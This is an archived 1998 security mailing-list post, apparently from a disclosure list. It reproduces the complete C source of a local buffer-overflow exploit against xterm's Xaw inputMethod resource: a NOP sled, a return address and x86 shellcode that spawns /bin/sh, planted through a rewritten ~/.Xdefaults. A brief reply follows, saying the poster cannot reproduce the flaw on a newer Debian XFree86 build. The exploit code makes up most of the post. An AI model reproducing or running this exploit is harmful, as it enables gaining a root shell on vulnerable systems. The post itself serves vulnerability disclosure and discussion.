xterm exploit [TOG issue]

From: Andrea Arcangeli (arcangeliat_private)
Date: Fri May 08 1998 - 07:50:05 PDT

Next message: Helmut Springer: "4 Advisories for Digital Unix: ftp, advs, rpc.statd, ftpd"

Previous message: zef: "dip-3.3.7o exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

/*

  xterm_exp.c : linux/x86 xterm.Xaw exploit
  by alcuin - 5/4/98 - [ http://www.rootshell.com/ ]

  It works against both Xaw and neXtaw widgets

  NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to
  use xterm again.

*/

#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>


unsigned int getsp() {
  asm("mov %esp,%eax");
}

inline rootshell(){
  __asm__(
      "movb $0x56, %al\n\t"
      "l1:cmpb $0x12, %al\n\t"
      "je l2\n\t"
      "movb $0x12,%al\n\t"
      "call l1\n\t"
      "l2:pop %esi\n\t"
      "xorl %eax,%eax\n\t"
      "movb $0x25, %al\n\t"
      "addl %eax,%esi\n\t"
      "movl %esi,%ebx\n\t"
      "movl %esi,%edi\n\t"
      "movb $8,%al\n\t"
      "addl %eax,%edi\n\t"
      "movb $5,%al\n\t"
      "addl %eax,%esi\n\t"
      "movl %esi,(%edi)\n\t"
      "movl %edi,%ecx\n\t"
      "incl %edi\n\t"
      "incl %edi\n\t"
      "incl %edi\n\t"
      "incl %edi\n\t"
      "xorb %al,%al\n\t"
      "movl %eax,(%edi)\n\t"
      "movl %edi,%edx\n\t"
      "movb $0xb,%al\n\t"
      "int $0x80\n\t"
      ".string \"/bin/sh\"\n"
      );
}


#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"

main (int argc, char **argv) {

  char *home;
  FILE *f_in, *f_out;
  char buf[16384];
  char shellbuf[16384];
  char *s;
  int i;
  unsigned int sp=getsp();

  if (home = getenv("HOME")) chdir(home);

  if (!(f_out = fopen(NEWFILE, "w"))) {
    perror("fopen");
    exit(1);
  }

  if (f_in = fopen(CONFFILE, "r")) {
    fseek(f_in,0,SEEK_SET);
    while (!feof(f_in)) {
      fgets(buf,16384,f_in);
      for (s=buf;isblank(*s);s++);
      if (strncmp(s,"xterm*inputMethod",17)<0)
        fputs(buf,f_out);
    }
    fclose(f_in);
  }

  /* fill the buffer with nops */
  memset(shellbuf, 0x90, sizeof(shellbuf));
  shellbuf[sizeof(shellbuf)-1] = 0;

  /* write the return adress */
  s = shellbuf+2052;
  *(int *)s=sp+0x69F5;

  /* write the root shell code */
  s = shellbuf+2800;
  strcpy(s,(char*)rootshell);

  fputs("xterm*inputMethod:",f_out);
  fputs(shellbuf, f_out);
  fclose(f_out);

  system("/bin/cp "CONFFILE" "OLDFILE);
  system("/bin/mv -f "NEWFILE" "CONFFILE);

  execl("/usr/X11R6/bin/xterm","xterm",NULL);
}

I can' t reproduce the problem with the latest Debian compiled XFree86:

andrea@dragon:~$ dpkg -l xbase
Desired=Unknown/Install/Remove/Purge
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
||/ Name            Version        Description
+++-===============-==============-============================================
ii  xbase           3.3.2-4        local clients and configuration required by

Andrea[s] Arcangeli

Next message: Helmut Springer: "4 Advisories for Digital Unix: ftp, advs, rpc.statd, ftpd"
Previous message: zef: "dip-3.3.7o exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:52:39 PDT